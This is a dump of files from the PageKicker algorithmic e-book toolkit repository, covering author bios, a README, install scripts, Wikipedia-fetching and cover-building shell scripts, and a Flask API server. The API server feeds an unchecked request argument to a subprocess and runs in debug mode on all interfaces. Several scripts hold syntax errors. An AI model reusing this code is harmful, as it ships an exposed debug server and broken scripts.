1, "path": "/conf/jobprofiles/authorbios/John.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "John is is a board certified clinical psychologist Diplomate of the American Board of Professional Psychology.\n" }, { "alpha_fraction": 0.7518022656440735, "alphanum_fraction": 0.7528321146965027, "avg_line_length": 484, "blob_id": "abacc1ca0d09ad7d1146ebe57f984fadc0029be2", "content_id": "238eb290dc761dcffe7372040a0a4574311eb05a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 971, "license_type": "permissive", "max_line_length": 728, "num_lines": 2, "path": "/conf/jobprofiles/authorbios/Hollywood_kids.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "TTwo Hollywood kids, Kate Beswick and John Harding, with movie picture parents keep running into each other. At elementary school, Hawthorne, in Beverly Hills, I was an illegal. We had just arrived in LA and lived at the Montecito in Hollywood. To get me into Hawthorne, my father got me a fake Beverly Hills address - Dalton Trumbo's house. He took me by to show me the house so I could answer questions, if asked. My dad said, \"We can trust this guy because he's a Commie like us.\" \"A Commie lives in a mansion like that?\" I said. Dad said, \"What do you think, all Commies are poor?\" So, each day I would sneak from Hollywood to Beverly Hills and after school, I would sneak back to Hollywood. That was the beginning of my life in crime.\nOMG! So you stayed at the Montecito, asl well. And, YES, we had a pull-down bed. Did you and I sleep in the same bed? - at the Montecito, I mean. I was in the 5th grade at Hawthorne, along with Warner Leroy. Did we pass each other in the hallway? \n" }, { "alpha_fraction": 0.5363534688949585, "alphanum_fraction": 0.5475391745567322, "avg_line_length": 29.827587127685547, "blob_id": "39c75ea3a495f6bd38ecdb7d72769c8849e33277", "content_id": "9677d0383149d9892cc38ba90f14fa0f2c79fe7a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1788, "license_type": "permissive", "max_line_length": 75, "num_lines": 58, "path": "/api/api-server.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 7 18:44:35 2016\n\n@author: fred\n\"\"\"\nimport subprocess\nimport os\nimport psutil\nfrom flask import Flask, request, send_from_directory\nimport configparser\nconfig = configparser.ConfigParser()\nconfig.read(\"config.ini\")\ncommandpath = config.get(\"Paths\", \"commandpath\")\nmycwd = config.get(\"Paths\", \"mycwd\")\nprint('local commandpath and working directory are ' + commandpath, mycwd)\n\n\[email protected]('/api', methods=['GET', 'POST'])\ndef buy_bookbuild():\n\n key1 = str(request.args.get('key1'))\n command = [ commandpath, '-S', key1]\n status = subprocess.check_call(command, cwd = mycwd)\n status = ('exiting with status ' + str(status))\n # print(status)\n return send_from_directory('/tmp/pagekicker/', 'delivery.epub')\n\n\n# Initialize and run the server\nif __name__ == '__main__':\n\n import click\n\n @click.command()\n @click.option(\"-d\", \"--daemon\", default=False, is_flag=True,\n help=\"Run in daemon mode.\")\n\n def run(daemon):\n if daemon:\n pid_file = './api-server.pid'\n if os.path.isfile(pid_file):\n pid = int(open(pid_file).read())\n os.remove(pid_file)\n try:\n p = psutil.Process(pid)\n p.terminate()\n except:\n pass\n try:\n p = subprocess.Popen(['python3', 'api-server.py'])\n open(pid_file, 'w').write(str(p.pid))\n except subprocess.CalledProcessError:\n raise ValueError(\"error starting api-server.py daemon\")\n else:\n print(\"api-server running...\")\n app.run(host='::', port=5035, debug=True)\n run()\n" }, { "alpha_fraction": 0.7354838848114014, "alphanum_fraction": 0.7383512258529663, "avg_line_length": 26.899999618530273, "blob_id": "7bf8b0c04f9767d279ba4aa942a3677db7ff65f3", "content_id": "ea86bfd1e8113b3e9bebe149b2ea9d37cab46cf7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1395, "license_type": "permissive", "max_line_length": 214, "num_lines": 50, "path": "/README.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# PageKicker Algorithmic Publishing Toolkit\n\nAlgorithmic book creation toolkit: push a button, build a unique new e-book using permissioned content.\n\nPageKicker accepts explicit or implicit user specifications, searches permissioned content, fetches it, analyzes, designs, assembles, converts, and distributes the results in ebook, web, document, or mobile format.\n\n### Install on Debian-Ubuntu Linux\n\n```\ncd ~\n\ngit clone https://github.com/fredzannarbor/pagekicker-community.git\n\ncd pagekicker-community\n\n./simple-install.sh`\n```\n\n### Quick Start\n\nRun this example job:\n```\ncd ~/pagekicker-community/scripts # all commands must be launched from this directory\n\nbin/builder.sh --seedsviacli \"Fancy Bear; Kaspersky\" --booktitle \"Cybersecurity Demo Book\" --covercolor \"red\"\n\n```\n\n- runs verbosely by default, to make it run silently add 1> /dev/null to end of command\n- searches wikipedia by default\n```\n\n- look in most recently created tmp directory for results\n\n```ls -lart /tmp/pagekicker```\n\n- complete books begin with an SKU, e.g. 100*** and end with .docx, etc.\n\n\n### Experiment by adding some useful command line options\n\n```bin/builder.sh --seedsviacli \"Fancy Bear; Kaspersky\" --booktitle \"Wapack Demo Book\" --expand_seeds_to_pages \"yes\"```\n\n- The system will spider out to all page hits for these key words\n\n```--covercolor \"Red\"```\n\n```--coverfont \"Arial\"```\n\n```--editedby \"Charles Dickens\"```\n" }, { "alpha_fraction": 0.7055016160011292, "alphanum_fraction": 0.7055016160011292, "avg_line_length": 9.655172348022461, "blob_id": "7a48e7e26a6e9294c5e23358d32a7add8462fe00", "content_id": "6b083b975675cfb6535c72ba81d7cd09524b86d5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 309, "license_type": "permissive", "max_line_length": 61, "num_lines": 29, "path": "/scripts/includes/readingstype.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# add if logic for price rx rows\n\n# if logic for readingstype\n\n# search-based book\n\ncase $booktype on\n\nReader)\n\necho \"booktype is\" $booktype\nreadingstype=\" Reader\"\n\n;;\n\nExplorer)\n\nreadingstype=\" Explorer\"\n\n;;\n\n*)\n\nreadingstype=$booktype\n;;\n\nesac\n\necho \"readingstype is \" $readingstype | tee --append $sfb_log\n" }, { "alpha_fraction": 0.669803261756897, "alphanum_fraction": 0.6809238791465759, "avg_line_length": 29.763158798217773, "blob_id": "d5de0b7ef2e95ee9255c5b1efdcc99e8b89d0997", "content_id": "f9747416a6ce248976c9ecff18e82ac7d5d68c4b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1169, "license_type": "permissive", "max_line_length": 107, "num_lines": 38, "path": "/test/wapack_test.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# version1.0 test suite\n# runs test of all production-visible scripts\n\necho \"------------------------version 1.0-------------------------------\"\n\nif shopt -q login_shell ; then\n\n\tif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\t\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\t\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\t\techo \"exiting\"\n\t\texit 1\n\telse\n\t\t. \"$HOME\"/.pagekicker/config.txt\n\t\techo \"read config file from login shell $HOME\"\"/.pagekicker/config.txt\"\n\tfi\nelse\n\t. /home/$(whoami)/.pagekicker/config.txt #hard-coding /home is a hack\n\techo \"read config file from nonlogin shell /home/$(whoami)/.pagekicker/config.txt\"\nfi\n\ncd $scriptpath\necho \"$import_available_on_machine importing\"\n. includes/set-variables.sh\n\n../test/paella.sh\n../test/decimator-test.sh ../test/data/Zalasiewicz_Technosphere_2016.pdf \"pioneering metrics and inventory\"\n#bin/xform.sh \"$SFB_HOME\"test/data mettan.xml\n\nif [ \"$import_available_on_machine\" = \"no\" ] ; then\n\t(>&2 echo \"importing not available on this machine\")\nelse\n\t\t. ../test/import-paella.sh\nfi\n\nbin/memecard.sh --infile ../test/data/FBadvisory.md --tldr \"Addicted to Facebook?\"\n" }, { "alpha_fraction": 0.5027322173118591, "alphanum_fraction": 0.5355191230773926, "avg_line_length": 14.333333015441895, "blob_id": "b6ae4e0796774cf1636602ada85343b2072b71cd", "content_id": "038d69c9c1540c5e1695beb51f63f79575f50a69", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 183, "license_type": "permissive", "max_line_length": 75, "num_lines": 12, "path": "/scripts/random-line.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nif [ \"$1\" ]; then\n\n WORDLINE=$((($RANDOM * $RANDOM) % $(wc -l $1 | awk '{print $1}') + 1))\"p\"\n sed -n $WORDLINE $1\n\nelse\n echo \"USAGE: random_line.sh $FILE\"\nfi\n\nexit 0" }, { "alpha_fraction": 0.766331672668457, "alphanum_fraction": 0.786432147026062, "avg_line_length": 397, "blob_id": "5784f314e182ad42c500fba529787d95fef4dfb0", "content_id": "c30f8d59df8c8b82e3b05a65f2d49535f254efaf", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 402, "license_type": "permissive", "max_line_length": 397, "num_lines": 1, "path": "/conf/jobprofiles/authorbios/Otzi.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "This book was assembled with pride by PageKicker robot <b>Ötzi</b>. Ötzi's inspiration was a man who lived around 3,300 BCE and died by violence in the Ötzal Alps, where his mummified body was subsequently discovered in September 1991. Robot Ötzi enjoys reading and writing about copper smelting, hunting, tattoos wild goats, and the Alps, and (in his spare time) watching \"The Big Bang Theory\".\n" }, { "alpha_fraction": 0.5302663445472717, "alphanum_fraction": 0.6125907897949219, "avg_line_length": 10.44444465637207, "blob_id": "a0599b40ca61aa3f4f397f98f142de52a1c603ec", "content_id": "2a7b21e5774d07171d4225fb86c8c9dbbd6879ed", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 413, "license_type": "permissive", "max_line_length": 34, "num_lines": 36, "path": "/scripts/includes/old.pricing.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#pricing logic\n\n# echo \"doccount is\" $doccount\n\necho \"price is \" $price\necho \"doccount is \"$doccount\n\nif [ \"$doccount\" -lt 9 ] ; then\n\n\tprice=0.99\n\nelif [ $doccount -lt 19 ] ; then\n\n\tprice=0.99\n\nelif [ $doccount -lt 49 ] ; then\n\n\tprice=2.99\n\nelif [ $doccount -lt 99 ] ; then\n\n\tprice=4.99\n\nelif [ $doccount -lt 249 ] ; then\n\n\tprice=4.99\n\nelif [ $doccount -lt 499 ] ; then\n\n\tprice=4.99\n\nelse\n\n\tprice=4.99\n\nfi\n\n" }, { "alpha_fraction": 0.7057546377182007, "alphanum_fraction": 0.7133550643920898, "avg_line_length": 34.38461685180664, "blob_id": "ea08a7576e9fb6e22bf720ff3319a709945bd248", "content_id": "75db2f1a690ec63874fedf482e6e9be46809651a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 921, "license_type": "permissive", "max_line_length": 141, "num_lines": 26, "path": "/scripts/includes/fetch-search-results.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\t# fetch the documents for this seed\n\twhile IFS='\t' read url title description\n\tdo\t\n\n\techo 'processing fetch lists' \n\n\techo \"url is\" $url\n\twikiurl=$(echo $url | sed -e 's/.*wiki\\///')\n\techo \"wikiurl is\" $wikiurl\n\techo \"title is \" $title\n\techo \"description is\" $description\n\n\tfetchurlbase=\"http://\"$wikilocale\".wikipedia.org/w/api.php?action=parse&format=json&page=\"\n\techo \"fetchurlbase is\" $fetchurlbase \n\tendfetchurl=\"&mobileformat=html&noimages=\"\n\tfetchurl=$fetchurlbase$wikiurl$endfetchurl\n\techo \"url to be fetched is\" $fetchurl\n\n\tcurl --silent --connect-timeout 15 --max-time 45 --max-redirs 1 --junk-session-cookies -o tmp/$uuid/wiki/$count.json $fetchurl 1> /dev/null\n\n\techo \"fetched document from\" $fetchurl \"using curl and saved as tmp/\"$uuid/wiki/$count\".html\" \n\n\techo \"number of docs fetched so far on seed\" $seed \"is \" $count \"out of \" $doccount \n\tcount=$((count+1))\n\n\tdone <fetch/$uuid/safesearchresults.txt\n" }, { "alpha_fraction": 0.5948991775512695, "alphanum_fraction": 0.6126927733421326, "avg_line_length": 21.08733558654785, "blob_id": "5d766174c1a06a4e1615b753e239060ba5926ed2", "content_id": "92dece3cc9c93f48ba51e520ab66eda2685e834e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 5058, "license_type": "permissive", "max_line_length": 101, "num_lines": 229, "path": "/complex-install.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\n# This is the complex install script for PageKicker.\n#\n\n# NOT YET WORKING, USE simple-install.sh INSTEAD!!\n###########\n\nBLACK='\\033[30;1m'\nRED='\\033[91;1m'\nGREEN='\\033[32;1m'\nCYAN='\\033[36;1m'\nRESET='\\033[0m'\n\nprint_step() {\n printf \"$BLACK$1$RESET\\n\"\n}\n\nprint_error() {\n printf \"$RED$1$RESET\\n\"\n}\n\nprint_warning() {\n printf \"$CYAN$1$RESET\\n\"\n}\n\nprint_good() {\n printf \"$GREEN$1$RESET\\n\"\n}\n\nprogram_exists() {\n if ! type \"$1\" > /dev/null 2>&1; then\n return 1\n else\n return 0\n fi\n}\n\npip3_package_exists() {\n python3 -c \"import $1\" 2> /dev/null && return 0 || return 1\n}\n\nspinner() {\n while true; do\n printf '\\\\\\b'\n sleep 0.1\n printf 'l\\b'\n sleep 0.1\n printf '/\\b'\n sleep 0.1\n printf -- '-\\b'\n sleep 0.1\n done\n}\n\nprint_and_run(){\n case \"$1\" in\n *sudo*) sudo -l > /dev/null ;;\n esac\n print_step \"$1\"\n spinner &\n spinner_pid=$!\n $1\n kill $spinner_pid\n wait $spinner_pid 2> /dev/null\n printf ' ' # clear spinner\n printf '\\n'\n}\n\nsystemctl_or_service(){\n if program_exists \"systemctl\"; then\n print_and_run \"sudo systemctl ${1} ${2}.service\"\n else\n print_and_run \"sudo service ${2} ${1}\"\n fi\n}\n\ninstall_dependencies_debian_linux(){\n print_step \"Installing PageKicker and its dependencies on your Debian/Ubuntu Linux...\"\n APT_FLAG=0\n arch=$(uname -m)\n\n if ! program_exists \"sudo\"; then\n\tapt-get install -q -y sudo\n fi\n\n # check for /usr/bin/pip3\n if [ \"$(which pip3)\" = \"\" ]; then\n # pip3 incompleteread fix\n sudo apt-get remove -y python3-requests python3-pip\n wget https://bootstrap.pypa.io/get-pip.py\n sudo python3 get-pip.py\n sudo rm get-pip.py\n fi\n\n if [ \"$(which pip3)\" = \"/usr/bin/pip3\" ]; then\n # pip3 incompleteread fix\n sudo apt-get remove -y python3-requests python3-pip\n wget https://bootstrap.pypa.io/get-pip.py\n sudo python3 get-pip.py\n sudo rm get-pip.py\n fi\n\n if pip3_package_exists \"setuptools\"; then\n sudo pip3 uninstall -y setuptools\n fi\n\n if [ \"$APT_FLAG\" = \"0\" ]; then\n print_and_run \"sudo apt-get -q update\"\n fi\n\n\n\n # install fonts\n\n # need /usr/share/fonts/truetype/ttf-dejavu\n\n # create directory structure\n\n mkdir -m 755 ~/.pagekicker\n mkdir -m -p /tmp/pagekicker\n\n # create local-data directory structure\n\n # get master repository\n\n cd ~\n git clone https://github.com/fredzannarbor/pagekicker-community.git\n\n # install python dependencies\n\n cd ~/pagekicker-community\n pip install -r requirements.txt\n\n # installs ubuntu dependencies\n\n . apt-install.sh \n\n # get lib programs\n\n . get-lib.sh # fetches third party apps stored in PageKicker scripts/lib\n\n # set up imagemagick configuration\n\n . magick-setup.sh\n\n}\n\ninstall_optional_dependencies(){\n\n# Magento if needed\n\n# wget bitnami magento stack\n# sudo apt-get install xmlstarlet\n# Social media connectivity\n\n sudo apt-get install ruby-dev\n sudo gem install t\n sudo gem install facebook-cli\n # see https://github.com/specious/facebook-cli for info on how to authorize\n# mysql-client & mysql-server needed in future but not right now\n }\n\nverify_installation(){\n printf \"Verifying $1...\"\n if ! program_exists $1; then\n print_error \"[FAIL]\"\n fail=\"y\"\n else\n print_good \"[PASS]\"\n fi\n}\n\nverify_installation_all(){\n print_step \"Verifying installation\"\n fail=\n verify_installation \"python3\"\n verify_installation \"pip3\"\n\n if [ -z $fail ]; then\n print_good \"You have successfully installed PageKicker!\"\n print_step \"\"\n print_step \"\"\n exit 0\n else\n print_error \"Installation failed. Please contact support at [email protected]\"\n exit 1\n fi\n}\n\nsuggest_locale(){\n print_warning \"Warning: If your computer's locale is not US based\"\n print_warning \"Please set the following environment variables:\"\n print_step \"\\texport LC_ALL=C.UTF-8\"\n print_step \"\\texport LANG=C.UTF-8\"\n}\n\nAPI_warning(){\n print_warning \"To test the default system, you will need a Wikipedia API key.\"\n print_step \"Go to https://www.mediawiki.org/wiki/API:Login.\"\n}\n\nmain() {\n trap 'kill $spinner_pid; printf \"\\n\"; verify_installation_all; exit 1' 2\n # checks the system type and calls system specific install functions\n UNAME=$(uname)\n case \"${UNAME:-nil}\" in\n Linux)\n if program_exists \"apt-get\"; then\n install_dependencies_debian_linux\n else\n print_error \"Sorry, your system does not have either apt-get or yum package manager.\"\n exit 1\n fi\n *)\n print_error \"Sorry, $UNAME is currently not supported via this installer.\"\n exit 1\n ;;\n esac\n\n # test whether to install optional dependencies for Magento & social networking\n # install_optional_dependencies\n\n suggest_locale\n verify_installation_all\n api_warning\n}\n\nmain\n" }, { "alpha_fraction": 0.7012090086936951, "alphanum_fraction": 0.7374784350395203, "avg_line_length": 25.272727966308594, "blob_id": "b2c60b97986223b2b3968b11b46fb90be30ce530", "content_id": "758496488a10073f0bf17eca6cf4ce5a09faf8b6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 579, "license_type": "permissive", "max_line_length": 80, "num_lines": 22, "path": "/scripts/bin/setup.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n\n# run this on first use but after configuring \n\n. ../conf/config.txt\n\n# the builder and create-catalog-entry scripts expect these directories to exist\n\n\n# subdirectories in Magento that do not exist in core Magento without plugins\n\nmkdir -p -m 755 $SFB_MAGENTO_HOME\"var/import\" \nmkdir -p -m 755 $SFB_MAGENTO_HOME\"var/export\"\nmkdir -p -m 755 $SFB_MAGENTO_HOME\"media/webforms\"\nmkdir -p -m 755 $SFB_MAGENTO_HOME\"media/webforms/xml\"\n\n# subdirectories in TMPDIR\n\nmkdir -p -m 755 $TMPDIR\"pagekicker\"\nmkdir -p -m 755 $TMPDIR\"actual_builds\"\nmkdir -p -m 755 $TMPDIR\"seeds\"\n\n" }, { "alpha_fraction": 0.578180193901062, "alphanum_fraction": 0.6099823117256165, "avg_line_length": 23.354839324951172, "blob_id": "de1ef89ced774f7a5bae7af1355af954909391ea", "content_id": "ec23c8902d56488e07d435e2356fc97f0395f8a0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2264, "license_type": "permissive", "max_line_length": 47, "num_lines": 93, "path": "/scripts/bin/csv_to_metadata.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 22 11:16:16 2015\n\n@author: fred\n\"\"\"\nimport csv\nimport sys\nimport os\nfrom subprocess import call\n\n\nf = sys.argv[1]\nuuid = sys.argv[2]\nrow_no = int(sys.argv[3])\ntmpdir=\"/tmp/pagekicker/\"\nif not os.path.exists(tmpdir):\n os.makedirs(tmpdir)\nfolder = tmpdir+uuid\ncsvfolder = folder+'/csv/'\nif not(os.path.exists(csvfolder)):\n os.makedirs(csvfolder)\ndestination1 = folder + '/csv/row.editedby'\n#destination2 = folder + '/csv/row.price'\ndestination3 = folder + '/csv/row.description'\ndestination4 = folder + '/csv/row.product_name'\n#destination5 = folder + '/csv/row.jobprofile'\ndestination6 = folder + '/csv/row.seeds'\ndestination7 = folder + '/csv/row.imprint'\n#destination8 = folder + '/csv/row.catid'\n\n#destination1 = 'row.editedby'\n#destination2 = 'row.price'\n#destination3 = 'row.description'\n#destination4 = 'row.product_name'\n#destination5 = 'row.jobprofile'\n#destination6 = 'row.seeds'\n#destination7 = 'row.imprint'\n#destination8 = 'row.catid'\n\nf = open(f, 'rb')\nf1 = open(destination1, 'w')\n#f2 = open(destination2, 'w')\nf3 = open(destination3, 'w')\nf4 = open(destination4, 'w')\n#f5 = open(destination5, 'w')\nf6 = open(destination6, 'w')\nf7 = open(destination7, 'w')\n#f8 = open (destination8, 'w')\n\n\nreader = csv.reader(f)\n# print row_no #debug\ntry:\n rows = list(reader)\n #print rows[row_no]\n #print rows[row_no]\n editedby = rows[row_no][0]\n #price = rows[row_no][1]\n description = rows[row_no][1]\n product_name = rows[row_no][2]\n #jobprofile = rows[row_no][4]\n seeds = rows[row_no][3]\n imprint = rows[row_no][4]\n #catid = rows[row_no][7]\n print(editedby)\n #print price\n print(description)\n print(product_name)\n #print jobprofile\n print(seeds)\n print(imprint)\n # print catid\n f1.write(editedby)\n # f2.write(price)\n f3.write(description)\n f4.write(product_name)\n #f5.write(jobprofile)\n f6.write(seeds)\n f7.write(imprint)\n # f8.write(catid)\n # call ([\"ls\", \"-l\"])\n\nfinally:\n f.close() \n f1.close()\n #f2.close()\n f3.close()\n f4.close()\n #f5.close()\n f6.close()\n f7.close()\n # f8.close()" }, { "alpha_fraction": 0.7027027010917664, "alphanum_fraction": 0.7038778066635132, "avg_line_length": 35.956520080566406, "blob_id": "abec6d0502522c5b5279b251753c609b80772742", "content_id": "5323c579b3fa517d8ed47e63ae85e95b9273daea", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 851, "license_type": "permissive", "max_line_length": 112, "num_lines": 23, "path": "/scripts/bin/argparser.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# -*- codinwig: utf-8 -*-\n\"\"\"\nuniversal argparser for PageKicker\nruns at top of all bash scripts to parse positional parametters\n\n\"\"\"\n\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--infile\", help = \"seed file\", default = 'test')\nparser.add_argument(\"--lang\", help=\"wiki language bigram\", default = 'en')\nparser.add_argument(\"--request_type\", help=\"request type\", default = 'sum')\nparser.add_argument(\"--outfile\", help = \"path to outfile\", default = 'outfile')\nparser.add_argument(\"--summary\", help = \"true or false\", action = \"store_true\")\nparser.add_argument(\"--add_this_content\", help = \"path to document filename\", default = 'none')\nparser.add_argument(\"--add_this_content_part_name\", help = \"part heading in ToC\", action = \"User-Added Content\")\n\n\nargs = parser.parse_args()\n\ninput_file = args.infile\nprint(input_file)\n\n" }, { "alpha_fraction": 0.686274528503418, "alphanum_fraction": 0.6993464231491089, "avg_line_length": 12.909090995788574, "blob_id": "d6cb94bf17759e009e2fc2610e0aaccf6be9fef5", "content_id": "da30ae39cca8463e64edd75ac85182d6a559e2da", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 306, "license_type": "permissive", "max_line_length": 40, "num_lines": 22, "path": "/scripts/pdf_input_files.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!bin/bash \n\n# pdf-based book builder\n\n# all front matter will be inserted here\n\n# loop over pdf files\n\nshopt -s nullglob\nfor f in tmp/$uuid/inputs/*.pdf\ndo\n\t#process each file\n\n\t# convert to 8.5 x 11\n\t# ocr text\n\t# run alchemy\n\t# cover builders\n\t# write metadata\n\t# build ebooks\n\t# distribute files\n\ndone\n" }, { "alpha_fraction": 0.7201017737388611, "alphanum_fraction": 0.7402622699737549, "avg_line_length": 33.74829864501953, "blob_id": "94bd11d52e19cc5c178eb1a73f5176b8e95114a7", "content_id": "68989bed957acf7889da480d1efa10d7bfe0dd34", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 5113, "license_type": "permissive", "max_line_length": 241, "num_lines": 147, "path": "/scripts/includes/cover-build.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "echo \"starting cover builder\" | tee --append $sfb_log\n\n# cleanup previous images\n\nrm -rf images/*\necho \"removed previous images\" | tee --append $sfb_log\n\n# creating working directories for cover production\n\nmkdir images/$uuid\n\ncd images/$uuid ; mkdir ebookcover ; echo \"created directory images/$uuid/ebookcover\" ; cd $scriptpath ; echo \"changed directory back to \" $scriptpath | tee --append $sfb_log\n\n# get title straight\n\nif [ \"$customtitle\" = \"none\" ] ; then \n\t\n\tcovertitle=$titleprefix$escapeseed$titlesuffix\n\techo \"covertitle is\" $covertitle\n\techo \"titleprefix is\" $titleprefix\n\techo \"titlesuffix is\" $titlesuffix\n\techo \"escapeseed is\" $escapeseed\n\tsafecovertitle=$(echo \"$covertitle\" | sed -e 's/[[:space:]]/_/g' -e 's/[[:punct:]]/_/g' | sed -e 's/_$//')\n\techo \"safecovertitle is\" $safecovertitle\n\nelse\n\t\n\tcovertitle=$customtitle\n\nfi\n\n# get editedby straight\n\necho \"editedby is \" $editedby\n\n#if [ \"$customer_name\" = \"Guest\" ] ; then\n\n\n#\teditedby=\"PageKicker™\"\n#\tlastname=\"PageKicker™\"\n#\techo \"use default editedby, which is\" $editedby\n\n#else\n\n#\teditedby=$customer_name\n#\ttrue\n\n#\techo \"editedby is customer name, which is\" $customer_name\n\n#fi\n\n# decide which cover builder to use\n\necho \"covertype id is \" $covertype_id\n\ncase $covertype_id in\n\n1)\n\techo \"building default WordCloud cover\"\n\t\n\t# creates base canvases\n\n\tconvert -size 600x800 xc:$newcovercolor images/$uuid/ebookcover/canvas.png\n\tconvert -size 600x200 xc:$newcovercolor images/$uuid/ebookcover/topcanvas.png\n\tconvert -size 600x91 xc:$newcovercolor images/$uuid/ebookcover/bottomcanvas.png\n\tconvert -size 600x200 xc:$newcovercolor images/$uuid/ebookcover/toplabel.png\n\tconvert -size 600x91 xc:$newcovercolor images/$uuid/ebookcover/bottomlabel.png\n\n\t# build the Word Cloud cover\n\n\techo \"JAVA_BIN is\" $JAVA_BIN | tee --append $sfb_log\n\t$JAVA_BIN -jar $scriptpath\"lib/IBMcloud/ibm-word-cloud.jar\" -c $scriptpath\"lib/IBMcloud/examples/configuration.txt\" -w 600 -h 800 < tmp/$uuid/cumulative.txt > images/$uuid/ebookcover/$sku\"cloud.png\" 2> /dev/null\n\n\t# build print-size Word Cloud image\n\n\t$JAVA_BIN -jar $scriptpath\"lib/IBMcloud/ibm-word-cloud.jar\" -c $scriptpath\"lib/IBMcloud/examples/configuration.txt\" -w 2550 -h 3300 < tmp/$uuid/cumulative.txt > images/$uuid/ebookcover/$sku\"printcloud.png\" 2> /dev/null\n\n\n\t# underlay the Word Cloud cover\n\n\tcomposite -gravity Center images/$uuid/ebookcover/$sku\"cloud.png\" images/$uuid/ebookcover/canvas.png images/$uuid/ebookcover/canvas.png\n\n\t# build the canvas labels\n\n\n\t# echo \"about to build toplabel\"\n\n\techo \"newcoverfont is\" $newcoverfont\n\tconvert -background $newcovercolor -fill \"$coverfontcolor\" -gravity center -size 600x200 -font \"$newcoverfont\" caption:\"$covertitle\" images/$uuid/ebookcover/topcanvas.png +swap -gravity center -composite images/$uuid/ebookcover/toplabel.png\n\n\t# echo \"about to build bottomlabel\"\n\n\tconvert -background $newcovercolor -fill \"$coverfontcolor\" -gravity center -size 600x91 \\\n\t\t -font $newcoverfont caption:\"$editedby\" \\\n\t\t images/$uuid/ebookcover/bottomcanvas.png +swap -gravity center -composite images/$uuid/ebookcover/bottomlabel.png\n\n\t# lay the labels on top of the target canvas\n\n\tcomposite -geometry +0+0 images/$uuid/ebookcover/toplabel.png images/$uuid/ebookcover/canvas.png images/$uuid/ebookcover/step1.png\n\n\tcomposite -geometry +0+600 images/$uuid/ebookcover/bottomlabel.png images/$uuid/ebookcover/step1.png images/$uuid/ebookcover/step2.png\n\t\n\tcomposite -gravity south -geometry +0+0 $userlogo images/$uuid/ebookcover/step2.png images/$uuid/ebookcover/cover.png\n\n\tconvert images/$uuid/ebookcover/cover.png -border 36 -bordercolor white images/$uuid/ebookcover/bordercover.png\n\tcp images/$uuid/ebookcover/bordercover.png images/$uuid/ebookcover/$sku\"cover.png\"\n\tcp images/$uuid/ebookcover/bordercover.png $mediatargetpath$uuid/cover.png\n\tcp images/$uuid/ebookcover/bordercover.png $mediatargetpath$uuid/$sku\"cover.png\"\n\n;;\n\n2)\n\n\n#\techo \"building a cover from a customer-supplied base image\" | tee --append $sfb_log\n#\techo \"specified cover base image is \" $coverbase | tee --append $sfb_log\n#\techo \"specified cover font is\" $coverfont| tee --append $sfb_log\n#\techo \"specified cover color is \" $newcovercolor | tee --append $sfb_log\n#\tcp \"$coverbase\" \"images/$uuid/canvas.png\" | tee --append $sfb_log\n#\t\n#\t\n#\t# creates base canvas\n#\t\n#\tconvert -size 600x800 images/$uuid/canvas.png\n#\t\n\n#\t# build the canvas labels\n\n#\tconvert -background '#0008' -fill \"$newcovercolor\" -gravity center -size 600x200 \\\n#\t\t caption:\"$covertitle\" -pointsize 24 -font \"$newcoverfont\" \\\n#\t\t\t images/$uuid/topcanvas.png +swap -gravity north -composite images/$uuid/canvas.png\n\n#\tconvert -background '#0008' -fill \"$coverfontcolor}\" -gravity center -size 600x80 \\\n#\t\t caption:\"$edited_by\" -pointsize 20 -font 